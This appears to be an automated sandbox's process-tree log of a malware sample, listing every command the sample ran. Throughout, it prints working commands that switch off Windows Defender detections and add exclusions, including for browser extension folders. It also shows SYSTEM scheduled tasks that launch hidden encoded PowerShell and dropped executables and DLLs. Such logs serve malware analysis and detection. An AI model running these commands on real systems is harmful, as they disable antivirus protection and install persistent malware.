- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1416
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1216
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:2336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5072
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1660
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2304
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:3044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3512
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\VDiAXGzPiWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epUZFeichsCPC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fZHZowTYSgfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qBvbbKpBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\nxeoDZreGracWIVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:323⤵PID:2976
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:324⤵PID:2584
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:643⤵PID:1584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:323⤵PID:3316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:643⤵PID:4796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:323⤵PID:2260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:643⤵PID:2772
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:323⤵PID:2720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:643⤵PID:2644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:323⤵PID:2564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:643⤵PID:2524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:323⤵PID:2424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:643⤵PID:2652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:5024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1684
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:323⤵PID:1392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:643⤵PID:1308
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:323⤵PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:643⤵PID:4968
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gtuYppepa" /SC once /ST 04:00:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4816
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gtuYppepa"2⤵PID:3112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gtuYppepa"2⤵PID:4120
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MWViHNuTpmRlpInKg" /SC once /ST 03:26:11 /RU "SYSTEM" /TR "\"C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe\" Ci /LMsite_idfjF 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MWViHNuTpmRlpInKg"2⤵PID:1028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1096
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4444
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2368
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4620
-
C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exeC:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\kZxhwqG.exe Ci /LMsite_idfjF 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4588 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bpJjqbWMDOjxkYrvBb"2⤵PID:3904
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:2480
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:768
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:248
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4352 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qBvbbKpBU\wTDcpw.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wbeMFPOaxEodGIM" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3128
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wbeMFPOaxEodGIM2" /F /xml "C:\Program Files (x86)\qBvbbKpBU\xQnaRLd.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "wbeMFPOaxEodGIM"2⤵PID:3776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "wbeMFPOaxEodGIM"2⤵PID:4232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ahmsGQGyepwQnm" /F /xml "C:\Program Files (x86)\fZHZowTYSgfU2\vZajwhU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NOwjEMTwOUYCj2" /F /xml "C:\ProgramData\nxeoDZreGracWIVB\QOFtfPe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZeWhkVIxDswmIVkZF2" /F /xml "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\LlqHhEU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1844
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rhpwGKPBtZLjUbFdohf2" /F /xml "C:\Program Files (x86)\epUZFeichsCPC\eYzHLaL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4928
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BinjFlxHFUMMGNOij" /SC once /ST 00:37:44 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\JHEwijpMlSQrgvQB\gjmcrxLt\TEFcZVt.dll\",#1 /JCsite_idDSz 385118" /V1 /F2⤵
- Creates scheduled task(s)
PID:4776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BinjFlxHFUMMGNOij"2⤵PID:276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MWViHNuTpmRlpInKg"2⤵PID:3140
-
-
